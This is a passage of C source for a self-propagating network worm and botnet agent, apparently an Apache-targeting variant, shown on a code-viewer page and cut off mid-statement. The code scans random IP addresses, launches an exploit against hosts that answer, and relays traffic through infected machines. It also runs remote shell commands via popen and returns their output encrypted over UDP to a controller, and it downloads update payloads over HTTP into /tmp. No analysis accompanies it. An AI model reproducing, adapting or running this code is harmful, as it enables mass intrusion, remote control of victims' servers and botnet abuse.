📄 apache-
字号:
c=0;
d=0;
signal(SIGCHLD,nas);
signal(SIGHUP,nas);
while (1) {
static unsigned long timeout=0;
char buf_[3000],*buf=buf_;
int n,p;
long l,i;
unsigned long start=time(NULL);
fd_set read;
struct timeval tm;
memcpy((void*)&udpserver,(void*)&backup,sizeof(struct ainst));
FD_ZERO(&read);
FD_SET(udpserver.sock,&read);
udpserver.len=0;
l=udpserver.sock;
for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock != 0) {
FD_SET(clients[n].sock,&read);
clients[n].len=0;
if (clients[n].sock > l) l=clients[n].sock;
}
tm.tv_sec=2;
tm.tv_usec=0;
select(l+1,&read,NULL,NULL,&tm);
if (FD_ISSET(udpserver.sock,&read)) udpserver.len=AREAD;
for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock != 0) if (FD_ISSET(clients[n].sock,&read)) clients[n].len=AREAD;
timeout+=time(NULL)-start;
if (timeout >= 60) {
if (links == NULL || numlinks == 0) {
memset((void*)&initrec,0,sizeof(struct initsrv_rec));
initrec.h.tag=0x70;
for (bases=0;bases<argc-1;bases++) relay(cpbases[bases],(char*)&initrec,sizeof(struct initsrv_rec));
}
else if (!myip) {
memset((void*)&initrec,0,sizeof(struct initsrv_rec));
initrec.h.tag=0x74;
if (numlinks == 0 || links == NULL) for (bases=0;bases<argc-1;bases++) relay(cpbases[bases],(char*)&initrec,sizeof(struct initsrv_rec));
else broute(0,(char*)&initrec,sizeof(struct initsrv_rec));
}
timeout=0;
}
for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
unsigned int *newpids,on;
for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
pids[on-1]=0;
numpids--;
newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
for (on=0;on<numpids;on++) newpids[on]=pids[on];
free(pids);
pids=newpids;
}
#ifdef SCAN
if (myip) for (n=CLIENTS,p=0;n<(CLIENTS*2) && p<100;n++) if (clients[n].sock == 0) {
char srv[256];
if (d == 255) {
if (c == 255) {
a=classes[rand()%(sizeof classes)];
b=rand();
c=0;
}
else c++;
d=0;
}
else d++;
memset(srv,0,256);
sprintf(srv,"%d.%d.%d.%d",a,b,c,d);
clients[n].ext=time(NULL);
atcp_sync_connect(&clients[n],srv,SCANPORT);
p++;
}
for (n=CLIENTS;n<(CLIENTS*2);n++) if (clients[n].sock != 0) {
p=atcp_sync_check(&clients[n]);
if (p == ASUCCESS || p == ACONNECT || time(NULL)-((unsigned long)clients[n].ext) >= 5) atcp_close(&clients[n]);
if (p == ASUCCESS) {
char srv[256];
conv(srv,256,clients[n].in.sin_addr.s_addr);
if (mfork() == 0) {
exploit(srv);
exit(0);
}
}
}
#endif
for (n=0;n<CLIENTS;n++) if (clients[n].sock != 0) {
if (clients[n].ext2 == TCP_PENDING) {
struct add_rec rc;
memset((void*)&rc,0,sizeof(struct add_rec));
p=atcp_sync_check(&clients[n]);
if (p == ACONNECT) {
rc.h.tag=0x42;
rc.h.seq=newseq();
rc.h.id=clients[n].ext3;
audp_send(clients[n].ext,(void*)&rc,sizeof(struct add_rec));
FREE(clients[n].ext);
FREE(clients[n].ext5);
atcp_close(&clients[n]);
}
if (p == ASUCCESS) {
rc.h.tag=0x43;
rc.h.seq=newseq();
rc.h.id=clients[n].ext3;
audp_send(clients[n].ext,(void*)&rc,sizeof(struct add_rec));
clients[n].ext2=TCP_CONNECTED;
if (clients[n].ext5) {
atcp_send(&clients[n],clients[n].ext5,9);
clients[n].ext2=SOCKS_REPLY;
}
}
}
else if (clients[n].ext2 == SOCKS_REPLY && clients[n].len != 0) {
struct add_rec rc;
memset((void*)&rc,0,sizeof(struct add_rec));
l=atcp_recv(&clients[n],buf,3000);
if (*buf == 0) clients[n].ext2=TCP_CONNECTED;
else {
rc.h.tag=0x42;
rc.h.seq=newseq();
rc.h.id=clients[n].ext3;
audp_send(clients[n].ext,(void*)&rc,sizeof(struct add_rec));
FREE(clients[n].ext);
FREE(clients[n].ext5);
atcp_close(&clients[n]);
}
}
else if (clients[n].ext2 == TCP_CONNECTED && clients[n].len != 0) {
struct data_rec rc;
memset((void*)&rc,0,sizeof(struct data_rec));
l=atcp_recv(&clients[n],buf+sizeof(struct data_rec),3000-sizeof(struct data_rec));
if (l == AUNKNOWN) {
struct kill_rec rc;
memset((void*)&rc,0,sizeof(struct kill_rec));
rc.h.tag=0x42;
rc.h.seq=newseq();
rc.h.id=clients[n].ext3;
audp_send((struct ainst *)clients[n].ext,(void*)&rc,sizeof(struct kill_rec));
FREE(clients[n].ext);
FREE(clients[n].ext5);
atcp_close(&clients[n]);
}
else {
l=clients[n].len;
rc.h.tag=0x41;
rc.h.seq=newseq();
rc.h.id=clients[n].ext3;
rc.h.len=l;
_encrypt(buf+sizeof(struct data_rec),l);
memcpy(buf,(void*)&rc,sizeof(struct data_rec));
audp_send((struct ainst *)clients[n].ext,buf,l+sizeof(struct data_rec));
}
}
}
if (udpserver.len != 0) if (!audp_recv(&udpserver,&udpclient,buf,3000)) {
struct header *tmp=(struct header *)buf;
if (udpserver.len >= sizeof(struct header)) {
switch(tmp->tag) {
case 0x20: { // Versione
#ifdef LARGE_NET
senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC (LN)\n");
#else
senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC\n");
#endif
} break;
case 0x21: { // Aggiungere il collegamento
struct add_rec *sr=(struct add_rec *)buf;
if (udpserver.len < sizeof(struct add_rec)) break;
for (n=0;n<CLIENTS;n++) if (clients[n].sock == 0) {
char srv[256];
if (sr->socks == 0) conv(srv,256,sr->server);
else conv(srv,256,sr->socks);
clients[n].ext2=TCP_PENDING;
clients[n].ext3=sr->h.id;
clients[n].ext=(struct ainst*)malloc(sizeof(struct ainst));
if (clients[n].ext == NULL) {
clients[n].sock=0;
break;
}
memcpy((void*)clients[n].ext,(void*)&udpclient,sizeof(struct ainst));
if (sr->socks == 0) {
clients[n].ext5=NULL;
atcp_sync_connect(&clients[n],srv,sr->port);
}
else {
clients[n].ext5=(char*)malloc(9);
if (clients[n].ext5 == NULL) {
clients[n].sock=0;
break;
}
((char*)clients[n].ext5)[0]=0x04;
((char*)clients[n].ext5)[1]=0x01;
((char*)clients[n].ext5)[2]=((char*)&sr->port)[1];
((char*)clients[n].ext5)[3]=((char*)&sr->port)[0];
((char*)clients[n].ext5)[4]=((char*)&sr->server)[0];
((char*)clients[n].ext5)[5]=((char*)&sr->server)[1];
((char*)clients[n].ext5)[6]=((char*)&sr->server)[2];
((char*)clients[n].ext5)[7]=((char*)&sr->server)[3];
((char*)clients[n].ext5)[8]=0x00;
atcp_sync_connect(&clients[n],srv,1080);
}
if (sr->bind) abind(&clients[n],sr->bind,0);
break;
}
} break;
case 0x22: { // Collegamento di uccisione
struct kill_rec *sr=(struct kill_rec *)buf;
if (udpserver.len < sizeof(struct kill_rec)) break;
for (n=0;n<CLIENTS;n++) if (clients[n].ext3 == sr->h.id) {
FREE(clients[n].ext);
FREE(clients[n].ext5);
atcp_close(&clients[n]);
}
} break;
case 0x23: { // Trasmettere il messaggio
struct data_rec *sr=(struct data_rec *)buf;
if (udpserver.len < sizeof(struct data_rec)+sr->h.len) break;
for (n=0;n<CLIENTS;n++) if (clients[n].ext3 == sr->h.id) {
_decrypt(buf+sizeof(struct data_rec),sr->h.len);
atcp_send(&clients[n],buf+sizeof(struct data_rec),sr->h.len);
}
} break;
#ifndef LARGE_NET
case 0x24: { // Eseguire il comando
FILE *f;
struct sh_rec *sr=(struct sh_rec *)buf;
struct kill_rec kp;
int id;
if (udpserver.len < sizeof(struct sh_rec)+sr->h.len || sr->h.len > 2999-sizeof(struct sh_rec)) break;
memset((void*)&kp,0,sizeof(struct kill_rec));
id=sr->h.id;
(buf+sizeof(struct sh_rec))[sr->h.len]=0;
_decrypt(buf+sizeof(struct sh_rec),sr->h.len);
f=popen(buf+sizeof(struct sh_rec),"r");
if (f != NULL) {
while(1) {
struct data_rec rc;
char *str;
unsigned long len;
memset(buf,0,3000);
fgets(buf,3000,f);
if (feof(f)) break;
len=strlen(buf);
memset((void*)&rc,0,sizeof(struct data_rec));
rc.h.tag=0x41;
rc.h.seq=newseq();
rc.h.id=id;
rc.h.len=len;
_encrypt(buf,len);
str=(char*)malloc(sizeof(struct data_rec)+len);
if (str == NULL) break;
memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
memcpy((void*)(str+sizeof(struct data_rec)),buf,len);
audp_send(&udpclient,str,sizeof(struct data_rec)+len);
FREE(str);
}
pclose(f);
kp.h.tag=0x42;
kp.h.seq=newseq();
kp.h.id=id;
audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec));
}
else senderror(&udpclient,id,"Unable to execute command");
} break;
#else
case 0x24: { // Eseguire il comando
senderror(&udpclient,tmp->id,"Not implicated\n");
} break;
#endif
case 0x25: { // Rumore metallico
struct ping_rec *rp=(struct ping_rec *)buf;
struct pong_rec rc;
struct kill_rec kp;
if (udpserver.len < sizeof(struct ping_rec)) break;
memset((void*)&rc,0,sizeof(struct pong_rec));
memset((void*)&kp,0,sizeof(struct kill_rec));
rc.h.tag=0x44;
rc.h.seq=newseq();
rc.h.id=rp->h.id;
rc.from=myip;
audp_send(&udpclient,(char*)&rc,sizeof(struct pong_rec));
kp.h.tag=0x42;
rc.h.seq=newseq();
kp.h.id=rp->h.id;
audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec));
} break;
case 0x26: { // Itinerario
struct route_rec *rp=(struct route_rec *)buf;
unsigned long i;
if (udpserver.len < sizeof(struct route_rec)) break;
if (!useseq(rp->h.seq)) {
addseq(rp->h.seq);
if (rp->server == -1 || rp->server == 0 || rp->server == myip) relay(inet_addr("127.0.0.1"),buf+sizeof(struct route_rec),rp->h.len-sizeof(struct route_rec));
if (rp->server == -1 || rp->server == 0) broadcast(buf,rp->h.len);
else if (rp->server != myip) {
if (rp->hops == 0 || rp->hops > 16) relay(rp->server,buf,rp->h.len);
else {
rp->hops--;
broadcast(buf,rp->h.len);
}
}
for (i=LINKS;i>0;i--) memcpy((struct route_table*)&routes[i],(struct route_table*)&routes[i-1],sizeof(struct route_table));
memset((struct route_table*)&routes[0],0,sizeof(struct route_table));
routes[0].id=rp->h.id;
routes[0].ip=udpclient.in.sin_addr.s_addr;
routes[0].port=htons(udpclient.in.sin_port);
}
} break;
#ifndef LARGE_NET
case 0x27: { // Aggiornamento
struct update_rec *rp=(struct update_rec *)buf;
struct kill_rec np;
struct ainst up;
char *server,done=0,bufm[4096],srv[256];
long i,d,id;
int file;
char check=0;
if (udpserver.len < sizeof(struct update_rec)+rp->h.len || rp->h.len > 2999-sizeof(struct update_rec)) break;
memset((void*)&np,0,sizeof(struct kill_rec));
id=rp->h.id;
(buf+sizeof(struct update_rec))[rp->h.len]=0;
_decrypt(buf+sizeof(struct update_rec),rp->h.len);
if (!strncmp(buf+sizeof(struct update_rec),"http://",7)) server=buf+sizeof(struct update_rec)+7;
else server=buf+sizeof(struct update_rec);
for (i=0;i<strlen(server) && server[i] != '/';i++);
server[i]=0;
if (atcp_connect(&up,server,80) != 0) {
senderror(&udpclient,id,"Unable to connect to host\n");
atcp_close(&up);
break;
}
atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",server+i+1,server);
remove("/tmp/tmp");
if ((file=open("/tmp/tmp",O_WRONLY|O_CREAT)) == 0) {
senderror(&udpclient,id,"Unable to open temporary file for writing\n");
atcp_close(&up);
break;
}
while(!done) {
struct ainst *g[1];
g[0]=&up;
if (await(g,1,AREAD,20) != 0 || atcp_recv(&up,bufm,4096) != 0 || up.len == 0) {
senderror(&udpclient,id,"Error communicating with website\n");
done=2;
break;
}
for (d=0;d<up.len-3 && !done;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
for (d+=4;d<up.len;d++) write(file,(char*)&bufm[d],1);
while(1) {
struct ainst *g[1];
g[0]=&up;
if (await(g,1,AREAD,20) != 0) {
senderror(&udpclient,id,"Timed out while receiving data\n");
done=2;
break;
}
if (atcp_recv(&up,bufm,4096) != 0 || up.len <= 0) break;
for (d=0;d<up.len;d++) {
if (!strncmp(bufm+d,"UNKNOWN-CHECKSUM-SUCCESSFUL",27)) check=1;
write(file,(char*)&bufm[d],1);
}
}
if (done == 0) done=1;
}
}
close(file);
atcp_close(&up);
if (check ==⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -